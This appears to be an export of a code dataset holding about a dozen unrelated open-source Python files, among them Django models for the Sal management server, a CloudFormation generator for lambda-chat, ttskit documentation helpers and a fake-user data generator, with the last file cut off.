max_stars_repo_path (stringlengths 4-245) | max_stars_repo_name (stringlengths 7-115) | max_stars_count (int64 101-368k) | id (stringlengths 2-8) | content (stringlengths 6-1.03M)
---|---|---|---|---|
betting.py | Carterbouley/football-predictor | 189 | 11177898 | def test_betting_strategy(predictions, test_features, test_labels, bet_difference=0.05):
    result = {
        'spend': 0,
        'return': 0,
    }
    for i in range(len(predictions)):
        probabilities = predictions[i]['probabilities']
        # Bet on a draw when the model's draw probability beats the
        # bookmaker's implied probability by at least bet_difference.
        if probabilities[1] > (1 / test_features['odds-draw'][i]) + bet_difference:
            result['spend'] = result['spend'] + 1
            if test_labels[i] == 'D':
                result['return'] = result['return'] + test_features['odds-draw'][i]
    # Guard against division by zero when no bets were placed.
    result['performance'] = result['return'] / result['spend'] if result['spend'] else 0
    return result
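# Minimal usage sketch (hypothetical data shapes, not from the repo):
# `predictions` holds dicts with a 'probabilities' sequence, and
# `test_features['odds-draw']` holds per-match decimal odds.
# predictions = [{'probabilities': [0.5, 0.4, 0.1]}]
# test_features = {'odds-draw': [3.2]}
# print(test_betting_strategy(predictions, test_features, ['D']))
# -> {'spend': 1, 'return': 3.2, 'performance': 3.2}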
|
examples/ranking_others.py | khalillakhdhar/recommander_python | 407 | 11177912 | """
Running item recommendation algorithms
"""
from caserec.recommenders.item_recommendation.bprmf import BprMF
tr = '../../datasets/ml-100k/folds/0/train.dat'
te = '../../datasets/ml-100k/folds/0/test.dat'
BprMF(tr, te, batch_size=30).compute()
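# Note: the fold files are assumed to hold plain-text interaction triples
# ("user item feedback" per line), the format CaseRecommender's readers expect.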
|
server/models.py | nathandarnell/sal | 215 | 11177918 | import plistlib
import random
import string
from datetime import datetime
from xml.parsers.expat import ExpatError
import pytz
from dateutil.parser import parse
from ulid2 import generate_ulid_as_uuid
from django.contrib.auth.models import User
from django.db import models
from django.utils import timezone
from utils import text_utils
OS_CHOICES = (
('Darwin', 'macOS'),
('Windows', 'Windows'),
('Linux', 'Linux'),
('ChromeOS', 'Chrome OS'),
)
REPORT_CHOICES = (
('base64', 'base64'),
('base64bz2', 'base64bz2'),
('bz2', 'bz2'),
)
class ProfileLevel():
stats_only = 'SO'
read_only = 'RO'
read_write = 'RW'
global_admin = 'GA'
def GenerateKey():
key = ''.join(random.choice(string.ascii_lowercase + string.digits) for x in range(128))
try:
MachineGroup.objects.get(key=key)
return GenerateKey()
except MachineGroup.DoesNotExist:
return key
def GenerateAPIKey():
key = ''.join(random.choice(string.ascii_lowercase + string.digits) for x in range(24))
try:
ApiKey.objects.get(public_key=key)
return GenerateAPIKey()
except ApiKey.DoesNotExist:
return key
class UserProfile(models.Model):
user = models.OneToOneField(User, unique=True, on_delete=models.CASCADE)
LEVEL_CHOICES = (
('SO', 'Stats Only'),
('RO', 'Read Only'),
('RW', 'Read Write'),
('GA', 'Global Admin'),
)
level = models.CharField(max_length=2, choices=LEVEL_CHOICES, default='RO')
def __str__(self):
return self.user.username
User.userprofile = property(lambda u: UserProfile.objects.get_or_create(user=u)[0])
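# Convenience accessor: with this monkeypatched property, `some_user.userprofile`
# lazily creates (if needed) and returns the related UserProfile instance.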
class BusinessUnit(models.Model):
name = models.CharField(max_length=100)
users = models.ManyToManyField(User, blank=True)
def __str__(self):
return self.name
@classmethod
def display_name(cls):
return text_utils.class_to_title(cls.__name__)
class Meta:
ordering = ['name']
class MachineGroup(models.Model):
business_unit = models.ForeignKey(BusinessUnit, on_delete=models.CASCADE)
name = models.CharField(max_length=100)
key = models.CharField(db_index=True, max_length=255, unique=True,
blank=True, null=True, editable=False)
    def save(self, *args, **kwargs):
        if not self.id:
            self.key = GenerateKey()
        super(MachineGroup, self).save(*args, **kwargs)
def __str__(self):
return self.name
@classmethod
def display_name(cls):
return text_utils.class_to_title(cls.__name__)
class Meta:
ordering = ['name']
class DeployedManager(models.Manager):
def get_queryset(self):
return super(DeployedManager, self).get_queryset().filter(deployed=True)
class Machine(models.Model):
id = models.BigAutoField(primary_key=True)
machine_group = models.ForeignKey(MachineGroup, on_delete=models.CASCADE)
sal_version = models.CharField(db_index=True, null=True, blank=True, max_length=255)
deployed = models.BooleanField(default=True)
broken_client = models.BooleanField(default=False)
last_checkin = models.DateTimeField(db_index=True, blank=True, null=True)
first_checkin = models.DateTimeField(db_index=True, blank=True, null=True, auto_now_add=True)
serial = models.CharField(db_index=True, max_length=100, unique=True)
hostname = models.CharField(max_length=256, null=True, blank=True)
operating_system = models.CharField(db_index=True, max_length=256, null=True, blank=True)
memory = models.CharField(db_index=True, max_length=256, null=True, blank=True)
memory_kb = models.IntegerField(db_index=True, default=0)
hd_space = models.BigIntegerField(db_index=True, null=True, blank=True)
hd_total = models.BigIntegerField(db_index=True, null=True, blank=True)
hd_percent = models.CharField(max_length=256, null=True, blank=True)
console_user = models.CharField(max_length=256, null=True, blank=True)
machine_model = models.CharField(db_index=True, max_length=256, null=True, blank=True)
machine_model_friendly = models.CharField(db_index=True, max_length=256, null=True, blank=True)
cpu_type = models.CharField(max_length=256, null=True, blank=True)
cpu_speed = models.CharField(max_length=256, null=True, blank=True)
os_family = models.CharField(db_index=True, max_length=256,
choices=OS_CHOICES, verbose_name="OS Family", default="Darwin")
munki_version = models.CharField(db_index=True, max_length=256, null=True, blank=True)
manifest = models.CharField(db_index=True, max_length=256, null=True, blank=True)
objects = models.Manager() # The default manager.
deployed_objects = DeployedManager()
def get_fields(self):
return [(field.name, field.value_to_string(self)) for field in Machine._meta.fields]
def __str__(self):
if self.hostname:
return self.hostname
else:
return self.serial
@classmethod
def display_name(cls):
return text_utils.class_to_title(cls.__name__)
class Meta:
ordering = ['hostname']
GROUP_NAMES = {
'all': None,
'machine_group': MachineGroup,
'business_unit': BusinessUnit,
'machine': Machine}
class PluginScriptSubmission(models.Model):
id = models.BigAutoField(primary_key=True)
machine = models.ForeignKey(Machine, on_delete=models.CASCADE)
plugin = models.CharField(max_length=255)
historical = models.BooleanField(default=False)
recorded = models.DateTimeField(auto_now_add=True)
def __str__(self):
return '%s: %s' % (self.machine, self.plugin)
class Meta:
ordering = ['recorded', 'plugin']
class PluginScriptRow(models.Model):
id = models.BigAutoField(primary_key=True)
submission = models.ForeignKey(PluginScriptSubmission, on_delete=models.CASCADE)
pluginscript_name = models.TextField()
pluginscript_data = models.TextField(blank=True, null=True)
pluginscript_data_string = models.TextField(blank=True, null=True)
pluginscript_data_int = models.IntegerField(default=0)
pluginscript_data_date = models.DateTimeField(blank=True, null=True)
submission_and_script_name = models.TextField()
    def save(self, *args, **kwargs):
try:
self.pluginscript_data_int = int(self.pluginscript_data)
except (ValueError, TypeError):
self.pluginscript_data_int = 0
self.pluginscript_data_string = str(self.pluginscript_data)
try:
date_data = parse(self.pluginscript_data)
if not date_data.tzinfo:
date_data = date_data.replace(tzinfo=pytz.UTC)
self.pluginscript_data_date = date_data
        except (ValueError, TypeError):
# Try converting it to an int if we're here
try:
if int(self.pluginscript_data) != 0:
try:
self.pluginscript_data_date = datetime.fromtimestamp(
int(self.pluginscript_data), tz=pytz.UTC)
except (ValueError, TypeError):
self.pluginscript_data_date = None
else:
self.pluginscript_data_date = None
except (ValueError, TypeError):
self.pluginscript_data_date = None
        super(PluginScriptRow, self).save(*args, **kwargs)
def __str__(self):
return '%s: %s' % (self.pluginscript_name, self.pluginscript_data)
class Meta:
ordering = ['pluginscript_name']
class Plugin(models.Model):
name = models.CharField(max_length=255, unique=True)
order = models.IntegerField()
def __str__(self):
return self.name
class Meta:
ordering = ['order']
class MachineDetailPlugin(models.Model):
name = models.CharField(max_length=255, unique=True)
order = models.IntegerField()
    def __str__(self):
return self.name
class Meta:
ordering = ['order']
class Report(models.Model):
name = models.CharField(max_length=255, unique=True)
def __str__(self):
return self.name
class Meta:
ordering = ['name']
class SalSetting(models.Model):
name = models.CharField(max_length=255, unique=True)
value = models.TextField()
def __str__(self):
return self.name
class ApiKey(models.Model):
public_key = models.CharField(max_length=255)
private_key = models.CharField(max_length=255)
name = models.CharField(max_length=255)
has_been_seen = models.BooleanField(default=False)
read_write = models.BooleanField(default=False)
def save(self, *args, **kwargs):
if not self.id:
self.public_key = GenerateAPIKey()
self.private_key = ''.join(random.choice(
string.ascii_lowercase + string.digits) for x in range(64))
super(ApiKey, self).save(*args, **kwargs)
def __str__(self):
return self.name
class Meta:
ordering = ['name']
unique_together = ("public_key", "private_key")
class FriendlyNameCache(models.Model):
serial_stub = models.CharField(max_length=5)
friendly_name = models.CharField(max_length=255)
class ManagementSource(models.Model):
id = models.UUIDField(default=generate_ulid_as_uuid, primary_key=True)
name = models.CharField(max_length=255, unique=True)
def __str__(self):
return self.name
STATUS_CHOICES = (
('PRESENT', 'Present'),
('ABSENT', 'Absent'),
('PENDING', 'Pending'),
('ERROR', 'Error'),
('UNKNOWN', 'Unknown'),
)
class ManagedItem(models.Model):
id = models.UUIDField(default=generate_ulid_as_uuid, primary_key=True)
name = models.CharField(max_length=255)
machine = models.ForeignKey(Machine, on_delete=models.CASCADE)
management_source = models.ForeignKey(ManagementSource, on_delete=models.CASCADE)
date_managed = models.DateTimeField(default=timezone.now)
status = models.CharField(max_length=7, choices=STATUS_CHOICES, default='UNKNOWN')
data = models.TextField(editable=True, null=True)
class Meta:
unique_together = (("machine", "name", "management_source"),)
ordering = ['id']
class ManagedItemHistory(models.Model):
id = models.UUIDField(default=generate_ulid_as_uuid, primary_key=True)
recorded = models.DateTimeField()
name = models.CharField(max_length=255)
machine = models.ForeignKey(Machine, on_delete=models.CASCADE)
management_source = models.ForeignKey(ManagementSource, on_delete=models.CASCADE)
status = models.CharField(max_length=7, choices=STATUS_CHOICES, default='UNKNOWN')
class Meta:
unique_together = (("machine", "name", "management_source", "recorded"),)
ordering = ['-recorded']
def __str__(self):
return (
f"{self.machine}: {self.management_source.name} {self.name} {self.status} "
f"{self.recorded}")
class Fact(models.Model):
id = models.BigAutoField(primary_key=True)
machine = models.ForeignKey(Machine, related_name='facts', on_delete=models.CASCADE)
management_source = models.ForeignKey(
ManagementSource, related_name='facts', on_delete=models.CASCADE, null=True)
fact_name = models.TextField()
fact_data = models.TextField()
def __str__(self):
return '%s: %s' % (self.fact_name, self.fact_data)
class Meta:
ordering = ['fact_name']
class HistoricalFact(models.Model):
id = models.BigAutoField(primary_key=True)
machine = models.ForeignKey(Machine, related_name='historical_facts', on_delete=models.CASCADE)
management_source = models.ForeignKey(
ManagementSource, related_name='historical_facts', on_delete=models.CASCADE, null=True)
fact_name = models.CharField(max_length=255)
fact_data = models.TextField()
fact_recorded = models.DateTimeField()
def __str__(self):
return self.fact_name
class Meta:
ordering = ['fact_name', 'fact_recorded']
class Message(models.Model):
id = models.BigAutoField(primary_key=True)
machine = models.ForeignKey(Machine, related_name='messages', on_delete=models.CASCADE)
management_source = models.ForeignKey(
ManagementSource, related_name='messages', on_delete=models.CASCADE, null=True)
text = models.TextField(blank=True, null=True)
date = models.DateTimeField(default=timezone.now)
MESSAGE_TYPES = (
('ERROR', 'Error'),
('WARNING', 'Warning'),
('OTHER', 'Other'),
('DEBUG', 'Debug'),
)
message_type = models.CharField(max_length=7, choices=MESSAGE_TYPES, default='OTHER')
|
modules/intelligence-gathering/dnstwist.py | decidedlygray/ptf | 4,391 | 11177928 | #!/usr/bin/env python
#####################################
# Installation module for dnstwist
#####################################
# AUTHOR OF MODULE NAME
AUTHOR="<NAME> (ninewires)"
# DESCRIPTION OF THE MODULE
DESCRIPTION="This module will install/update dnstwist - Domain name permutation engine for detecting homograph phishing attacks, typo squatting, and brand impersonation"
# INSTALL TYPE GIT, SVN, FILE DOWNLOAD
# OPTIONS = GIT, SVN, FILE
INSTALL_TYPE="GIT"
# LOCATION OF THE FILE OR GIT/SVN REPOSITORY
REPOSITORY_LOCATION=""
# WHERE DO YOU WANT TO INSTALL IT
INSTALL_LOCATION="dnstwist"
# DEPENDS FOR DEBIAN INSTALLS
DEBIAN="git,python-pip,python3-dnspython python3-tld python3-geoip python3-whois python3-requests python3-ssdeep"
# DEPENDS FOR FEDORA INSTALLS
FEDORA="git,python-pip"
# COMMANDS TO RUN AFTER
AFTER_COMMANDS="cd {INSTALL_LOCATION},python3 -m pip install -r requirements.txt"
# CREATE LAUNCHER
LAUNCHER="dnstwist"
|
resources.py | lokitold/lambdachat | 416 | 11177948 | #!/usr/bin/env python
"""
Script to generate a CloudFormation Template that brings up all of the AWS
resources needed to run lambda-chat
This requires Python 2.7. To get the required libraries:
sudo pip install docopt boto troposphere awacs pyyaml --upgrade
Usage:
resources.py cf
resources.py launch --region=<region> --profile=<profile>
resources.py update --region=<region> --profile=<profile>
resources.py delete --region=<region> --profile=<profile>
resources.py output --region=<region> --profile=<profile>
Options:
-h --help Show this screen.
--version Show version.
--region=<region> The AWS region to use
--profile=<profile> The AWS credential profile to use
License:
Copyright 2015 CloudNative, Inc.
https://cloudnative.io/
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# Import all the goodness
import sys
from docopt import docopt
import yaml
from boto import cloudformation
from troposphere import Template, Parameter, Output
from troposphere import GetAtt, Ref, Join
import troposphere.iam as iam
import troposphere.sns as sns
import troposphere.s3 as s3
from awacs.aws import Action, Allow, Policy, Statement, Principal, Condition, StringEquals, AWSPrincipal
def default_config():
"""
Returns a dict with the default configuration
"""
return {
'stack_name': 'Lambda-Chat',
'tags': {
'Name': 'Lambda Chat',
'Creator': 'CloudNative'
}
}
def load_config():
"""
Returns the default config merged with the what is in the config.yml file
"""
try:
# Attempt to load configuration file
stream = file('config.yml', 'r')
config = yaml.load(stream)
config['loaded'] = True
except IOError:
config = {}
config['loaded'] = False
# Merge with default
return dict(default_config().items() + config.items())
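# An illustrative config.yml (keys grounded in this script; values are
# placeholders, not from the repo):
#
#   google_oauth_client_id: 123456-abcdef.apps.googleusercontent.com
#   s3_bucket: my-lambda-chat-site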
def assert_config_loaded():
"""
Stops execution and displays an error message if the settings have not
been loaded from config.yml
"""
if not config['loaded']:
print('ERROR: Could not load file: config.yml')
sys.exit(1)
def cf_params():
"""
Returns the parameters needed to create or update the CloudFormation
stack
"""
assert_config_loaded()
return [
('GoogleOAuthClientID', config['google_oauth_client_id']),
('WebsiteS3BucketName', config['s3_bucket']),
]
def generate_cf_template():
"""
Returns an entire CloudFormation stack by using troposphere to construct
each piece
"""
# Header of CloudFormation template
t = Template()
t.add_version("2010-09-09")
t.add_description("Lambda Chat AWS Resources")
    # Parameters
description = "should match [0-9]+-[a-z0-9]+.apps.googleusercontent.com"
google_oauth_client_id = t.add_parameter(Parameter(
"GoogleOAuthClientID",
AllowedPattern="[0-9]+-[a-z0-9]+.apps.googleusercontent.com",
Type="String",
Description="The Client ID of your Google project",
ConstraintDescription=description
))
website_s3_bucket_name = t.add_parameter(Parameter(
"WebsiteS3BucketName",
AllowedPattern="[a-zA-Z0-9\-]*",
Type="String",
Description="Name of S3 bucket to store the website in",
ConstraintDescription="can contain only alphanumeric characters and dashes.",
))
# The SNS topic the website will publish chat messages to
website_sns_topic = t.add_resource(sns.Topic(
'WebsiteSnsTopic',
TopicName='lambda-chat',
DisplayName='Lambda Chat'
))
t.add_output(Output(
"WebsiteSnsTopic",
Description="sns_topic_arn",
Value=Ref(website_sns_topic),
))
# The IAM Role and Policy the website will assume to publish to SNS
website_role = t.add_resource(iam.Role(
"WebsiteRole",
Path="/",
AssumeRolePolicyDocument=Policy(
Statement=[
Statement(
Effect=Allow,
Action=[Action("sts", "AssumeRoleWithWebIdentity")],
Principal=Principal("Federated", "accounts.google.com"),
Condition=Condition(
StringEquals(
"accounts.google.com:aud",
Ref(google_oauth_client_id)
)
),
),
],
),
))
t.add_resource(iam.PolicyType(
"WebsitePolicy",
PolicyName="lambda-chat-website-policy",
Roles=[Ref(website_role)],
PolicyDocument=Policy(
Version="2012-10-17",
Statement=[
Statement(
Effect=Allow,
Action=[Action("sns", "Publish")],
Resource=[
Ref(website_sns_topic)
],
),
],
)
))
t.add_output(Output(
"WebsiteRole",
Description="website_iam_role_arn",
Value=GetAtt(website_role, "Arn"),
))
website_bucket = t.add_resource(s3.Bucket(
'WebsiteS3Bucket',
BucketName=Ref(website_s3_bucket_name),
WebsiteConfiguration=s3.WebsiteConfiguration(
ErrorDocument="error.html",
IndexDocument="index.html"
)
))
t.add_output(Output(
"S3Bucket",
Description="s3_bucket",
Value=Ref(website_bucket),
))
t.add_resource(s3.BucketPolicy(
'WebsiteS3BucketPolicy',
Bucket=Ref(website_bucket),
PolicyDocument={
"Version": "2012-10-17",
"Statement": [
{
"Sid": "PublicAccess",
"Effect": "Allow",
"Principal": "*",
"Action": ["s3:GetObject"],
"Resource": [{
"Fn::Join": [
"",
[
"arn:aws:s3:::",
{
"Ref": "WebsiteS3Bucket",
},
"/*"
]
]
}]
}
]
}
))
return t
def launch(args, config, cf_conn, template):
"""
Create new CloudFormation Stack from the template
"""
print("Creating CloudFormation Stack %s..." % config['stack_name'])
stack_id = cf_conn.create_stack(
config['stack_name'],
template_body=template.to_json(),
parameters=cf_params(),
tags=config['tags'],
capabilities=['CAPABILITY_IAM']
)
print('Created ' + stack_id)
def update(args, config, cf_conn, template):
"""
Update an existing CloudFormation Stack
"""
print("Updating CloudFormation Stack %s..." % config['stack_name'])
stack_id = cf_conn.update_stack(
config['stack_name'],
template_body=template.to_json(),
parameters=cf_params(),
tags=config['tags'],
capabilities=['CAPABILITY_IAM']
)
print('Updated ' + stack_id)
def delete(args, config, cf_conn):
"""
Deletes an existing CloudFormation Stack
"""
# Delete an existing CloudFormation Stack with same name
print("Deleting CloudFormation Stack %s..." % config['stack_name'])
resp = cf_conn.delete_stack(
config['stack_name'],
)
print(resp)
def output(args, config, cf_conn):
"""
Describes a CloudFormation Stack and prints the outputs
"""
print("Describing CloudFormation Stack %s..." % config['stack_name'])
    resp = cf_conn.describe_stacks(
        config['stack_name']
    )
    print('---')
print('region: %s' % args['--region'])
for output in resp[0].outputs:
print("%s: %s" % (output.description, output.value))
if __name__ == '__main__':
args = docopt(__doc__, version='Lambda Chat AWS Resources 0.2')
config = load_config()
    # The template is also needed for 'update'; generating it only for
    # 'cf'/'launch' would leave `template` undefined below.
    needs_template = args['cf'] or args['launch'] or args['update']
    try:
        if needs_template:
            template = generate_cf_template()
        if args['cf'] or args['launch']:
            print(template.to_json())
        if args['cf']:
            sys.exit(0)
# Get a connection to AWS CloudFormation in the given region
conn = cloudformation.connect_to_region(
args['--region'], profile_name=args['--profile'])
if (args['launch']):
launch(args, config, conn, template)
elif (args['update']):
update(args, config, conn, template)
elif (args['delete']):
delete(args, config, conn)
elif (args['output']):
output(args, config, conn)
except Exception, e:
print('ERROR')
print(e)
print(e.message)
|
scripts/unfuck-path.py | kasymovga/taisei | 573 | 11177969 | #!/usr/bin/env python3
from taiseilib.common import (
run_main,
)
from pathlib import Path, PureWindowsPath, PurePosixPath
import sys
def main(args):
import argparse
parser = argparse.ArgumentParser(description='Because Windows is the worst.', prog=args[0])
parser.add_argument('path',
help='the path to operate on'
)
parser.add_argument('--from-windows',
action='store_true',
help='interpret source as a Windows path (default: POSIX path)'
)
parser.add_argument('--to-windows',
action='store_true',
help='output a Windows path (default: POSIX path)'
)
parser.add_argument('--escape-backslashes',
action='store_true',
help='escape any backslashes in the output'
)
args = parser.parse_args(args[1:])
if args.from_windows:
path = PureWindowsPath(args.path)
else:
path = PurePosixPath(args.path)
if args.to_windows:
out = str(PureWindowsPath(path))
else:
out = path.as_posix()
if args.escape_backslashes:
out = out.replace('\\', '\\\\')
sys.stdout.write(out)
if __name__ == '__main__':
run_main(main)
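# Usage sketch (illustrative invocations):
#   ./unfuck-path.py --from-windows 'C:\games\taisei'   -> C:/games/taisei
#   ./unfuck-path.py --to-windows src/main.c            -> src\main.c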
|
env/lib/python3.4/site-packages/bulbs/tests/gremlin_tests.py | mudbungie/NetExplorer | 234 | 11177989 | import unittest
from .testcase import BulbsTestCase
class GremlinTestCase(BulbsTestCase):
def setUp(self):
# self.client = RexsterClient()
# self.vertex_type = "vertex"
# self.edge_type = "edge"
#raise NotImplemented
pass
def test_gremlin(self):
# limiting return count so we don't exceed heap size
resp = self.client.gremlin("g.V[0..9]")
assert resp.total_size > 5
|
esmvaltool/cmorizers/obs/cmorize_obs_ceres_ebaf.py | cffbots/ESMValTool | 148 | 11178019 | """ESMValTool CMORizer for CERES-EBAF data.
Tier
Tier 2: other freely-available dataset.
Source
https://ceres-tool.larc.nasa.gov/ord-tool/jsp/EBAF4Selection.jsp
Last access
20191126
Download and processing instructions
Select: "TOA Fluxes" ("Shortwave Flux" and "Longwave Flux", "All Sky"
and "Clear Sky"), "Monthly Mean", "Regional 1x1 global grid".
"""
import logging
import os
import warnings
import iris
from . import utilities as utils
logger = logging.getLogger(__name__)
def filter_warnings():
"""Filter certain :mod:`iris` warnings."""
for msg in ('min', 'max'):
warnings.filterwarnings(
'ignore',
message=f"WARNING: valid_{msg} not used",
category=UserWarning,
module='iris',
)
def _extract_variable(short_name, var, cfg, filepath, out_dir):
"""Extract variable."""
raw_var = var.get('raw', short_name)
with warnings.catch_warnings():
filter_warnings()
cube = iris.load_cube(filepath, utils.var_name_constraint(raw_var))
# Fix units
cmor_info = cfg['cmor_table'].get_variable(var['mip'], short_name)
utils.convert_timeunits(cube, 1950)
# Fix coordinates
utils.fix_coords(cube)
# Fix metadata
attrs = cfg['attributes']
attrs['mip'] = var['mip']
utils.fix_var_metadata(cube, cmor_info)
utils.set_global_atts(cube, attrs)
# Save variable
with warnings.catch_warnings():
filter_warnings()
utils.save_variable(cube,
short_name,
out_dir,
attrs,
unlimited_dimensions=['time'])
def cmorization(in_dir, out_dir, cfg, _):
"""Cmorization func call."""
raw_filepath = os.path.join(in_dir, cfg['filename'])
# Run the cmorization
for (short_name, var) in cfg['variables'].items():
logger.info("CMORizing variable '%s'", short_name)
_extract_variable(short_name, var, cfg, raw_filepath, out_dir)
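# The cfg dict is assumed to carry entries along these lines (keys grounded
# in this file; values illustrative, not the project's actual config):
#   filename: <input NetCDF file name>
#   attributes: {...global metadata...}
#   variables:
#     <short_name>: {mip: Amon, raw: <variable name in the raw file>}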
|
Examples/AppKit/Todo/ToDoCell.py | Khan/pyobjc-framework-Cocoa | 132 | 11178050 | from Cocoa import *
import objc  # needed for objc.typedAccessor below
NOT_DONE=0
DONE=1
DEFERRED=2
class ToDoCell (NSButtonCell):
__slots__ = ('_triState', '_doneImage', '_deferredImage', '_timeDue' )
def init(self):
self._triState = NOT_DONE
self._timeDue = None
self._doneImage = None
self._deferredImage = None
NSButtonCell.initTextCell_(self, "")
self.setType_(NSToggleButton)
self.setImagePosition_(NSImageLeft)
self.setBezelStyle_(NSShadowlessSquareBezelStyle)
self.setFont_(NSFont.userFontOfSize_(10))
self.setAlignment_(NSRightTextAlignment)
self._doneImage = NSImage.imageNamed_("DoneMark")
self._deferredImage = NSImage.imageNamed_("DeferredMark")
return self
@objc.typedAccessor('i')
def setTriState_(self, newState):
if newState > DEFERRED:
self._triState = NOT_DONE
else:
self._triState = newState
self.updateImage()
@objc.typedAccessor('i')
def triState(self):
return self._triState
def setState_(self, val):
pass
def state(self):
if self._triState == DEFERRED:
return DONE
else:
return self._triState
def updateImage(self):
if self._triState == NOT_DONE:
#print "NO IMAGE"
self.setImage_(None)
elif self._triState == DONE:
#print "DONE IMAGE"
self.setImage_(self._doneImage)
elif self._triState == DEFERRED:
#print "DEFERRED IMAGE"
self.setImage_(self._deferredImage)
self.controlView().updateCell_(self)
def startTrackingAt_inView_(self, startPoint, controlView):
#print "startTracking:", startPoint, controlView
return 1
def stopTracking_at_inView_mouseIsUp_(self, lastPoint, stopPoint, controlView, flag):
#print "stopTracking:", lastPoint, stopPoint, controlView, flag, self.triState()
if flag:
self.setTriState_(self.triState() + 1)
def setTimeDue_(self, newTime):
if newTime:
self._timeDue = newTime
self.setTitle_(self._timeDue.descriptionWithCalendarFormat_timeZone_locale_("%I:%M %p", NSTimeZone.localTimeZone(), None))
else:
self._timeDue = None
self.setTitle_("-->")
def timeDue(self):
return self._timeDue
|
ttskit/makefile.py | shuahs/ttskit | 247 | 11178065 | from pathlib import Path
import logging
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(Path(__file__).stem)
import os
import datetime
def make_document():
"""生成模块脚本的说明文档。"""
code_dir = Path(__file__).parent
doc_path = code_dir.joinpath('document.txt')
with doc_path.open('wt', encoding='utf8') as fout:
fout.write(f'## {code_dir.name}\n\n')
for py_file in sorted(code_dir.glob('**/*.py')):
if py_file.stem == '__init__':
py_name = py_file.parent.relative_to(code_dir).__str__().replace('\\', '/')
else:
py_name = py_file.relative_to(code_dir).__str__()[:-3].replace('\\', '/')
doc_path.open('at', encoding='utf8').write(f'### {py_name}\n')
module_name = py_name.replace('/', '.')
os.system(f'python -m pydoc {module_name} >> {doc_path}')
doc_path.open('at', encoding='utf8').write('\n')
lines = doc_path.open('rt', encoding='utf8').readlines()
with doc_path.open('wt', encoding='utf8') as fout:
for line in lines:
            if line.startswith('\x1b[0m'):  # strip a leading ANSI reset sequence
logger.info(repr(line))
fout.write(line[4:])
continue
fout.write(line)
logger.info('Make document.txt done.')
def make_help():
"""生成运行项目的帮助文档。"""
code_dir = Path(__file__).parent
doc_path = code_dir.joinpath('help.txt')
with open(doc_path, 'wt', encoding='utf8') as fout:
fout.write(f'## {code_dir.name}\n\n')
for py_file in sorted(code_dir.glob('*.py')):
py_name = py_file.relative_to(code_dir).__str__()[:-3].replace('\\', '/')
doc_path.open('at', encoding='utf8').write(f'### {py_name}\n')
os.system(f'python {py_name}.py --help >> {doc_path}')
doc_path.open('at', encoding='utf8').write('\n\n')
lines = doc_path.open('rt', encoding='utf8').readlines()
with doc_path.open('wt', encoding='utf8') as fout:
for line in lines:
            if line.startswith('\x1b[0m'):  # strip a leading ANSI reset sequence
logger.info(repr(line))
fout.write(line[4:])
continue
fout.write(line)
logger.info('Make help.txt done.')
def make_requirements():
"""生成项目的依赖包。"""
os.system('pipreqs . --encoding=utf8 --force')
reqs = sorted(open('requirements.txt').readlines(), key=lambda x: x.lower())
with open('requirements.txt', 'wt', encoding='utf8') as fout:
for line in reqs:
if line.startswith('~'):
fout.write(f'# {line}')
else:
fout.write(line)
logger.info('Make requirements.txt done.')
def make_gitignore():
"""生成git项目的忽略列表。"""
with open('.gitignore', 'wt', encoding='utf8') as fout:
for line in '.idea .git __pycache__ venv static log'.split():
fout.write(f'{line}\n')
logger.info('Make .gitignore done.')
def make_readme():
"""生成README文档。"""
if Path('README.md').is_file():
with open('README.md', 'at', encoding='utf8') as fout:
version = datetime.datetime.now().strftime('%y.%m.%d')[1:].replace('.0', '.')
fout.write(f'\n### v{version}\n')
else:
with open('README.md', 'wt', encoding='utf8') as fout:
fout.write(f'## {Path(__file__).parent.name}\n\n')
            fout.write(f'## Version\n')
version = datetime.datetime.now().strftime('%y.%m.%d')[1:].replace('.0', '.')
fout.write(f'\n### v{version}\n')
logger.info('Make README.md done.')
def pip_install_requirements(reqspath=''):
reqspath = reqspath or 'requirements.txt'
for line in open(reqspath, encoding='utf8'):
pkg = line.strip()
os.system(f'pip install {pkg}')
logger.info(f'pip install {pkg} done.')
if __name__ == "__main__":
logger.info(__file__)
import sys
if len(sys.argv) == 2:
pip_install_requirements(sys.argv[1])
else:
pip_install_requirements()
# make_requirements()
# make_gitignore()
# make_readme()
# make_help()
# make_document()
|
Chapter11/CreateDataLake.py | VinushaVemuri/learn | 185 | 11178095 | from faker import Faker
import json
import os
os.chdir("/home/paulcrickard/datalake")
fake=Faker()
userid=1
for i in range(1000):
name=fake.name()
fname=name.replace(" ","-")+'.json'
data={
"userid":userid,
"name":name,
"age":fake.random_int(min=18, max=101, step=1),
"street":fake.street_address(),
"city":fake.city(),
"state":fake.state(),
"zip":fake.zipcode()
}
datajson=json.dumps(data)
output=open(fname,'w')
userid+=1
output.write(datajson)
output.close()
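# Read-back sketch: every record is a standalone JSON file in the lake
# directory, so it can be reloaded with glob + json, e.g.:
#   import glob
#   users = [json.load(open(f)) for f in glob.glob('*.json')]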
|
test/hlt/pytest/python/com/huawei/iotplatform/client/dto/NotifyFwUpgradeResultDTO.py | yuanyi-thu/AIOT- | 128 | 11178111 | class NotifyFwUpgradeResultDTO(object):
def __init__(self):
self.notifyType = None
self.deviceId = None
self.appId = None
self.operationId = None
self.subOperationId = None
self.curVersion = None
self.targetVersion = None
self.sourceVersion = None
self.Status = None
self.statusDesc = None
self.upgradeTime = None
def getNotifyType(self):
return self.notifyType
def setNotifyType(self, notifyType):
self.notifyType = notifyType
def getDeviceId(self):
return self.deviceId
def setDeviceId(self, deviceId):
self.deviceId = deviceId
def getAppId(self):
return self.appId
def setAppId(self, appId):
self.appId = appId
def getOperationId(self):
return self.operationId
def setOperationId(self, operationId):
self.operationId = operationId
def getSubOperationId(self):
return self.subOperationId
def setSubOperationId(self, subOperationId):
self.subOperationId = subOperationId
def getCurVersion(self):
return self.curVersion
def setCurVersion(self, curVersion):
self.curVersion = curVersion
def getTargetVersion(self):
return self.targetVersion
def setTargetVersion(self, targetVersion):
self.targetVersion = targetVersion
def getSourceVersion(self):
return self.sourceVersion
def setSourceVersion(self, sourceVersion):
self.sourceVersion = sourceVersion
def getStatus(self):
return self.Status
def setStatus(self, Status):
self.Status = Status
def getStatusDesc(self):
return self.statusDesc
def setStatusDesc(self, statusDesc):
self.statusDesc = statusDesc
def getUpgradeTime(self):
return self.upgradeTime
def setUpgradeTime(self, upgradeTime):
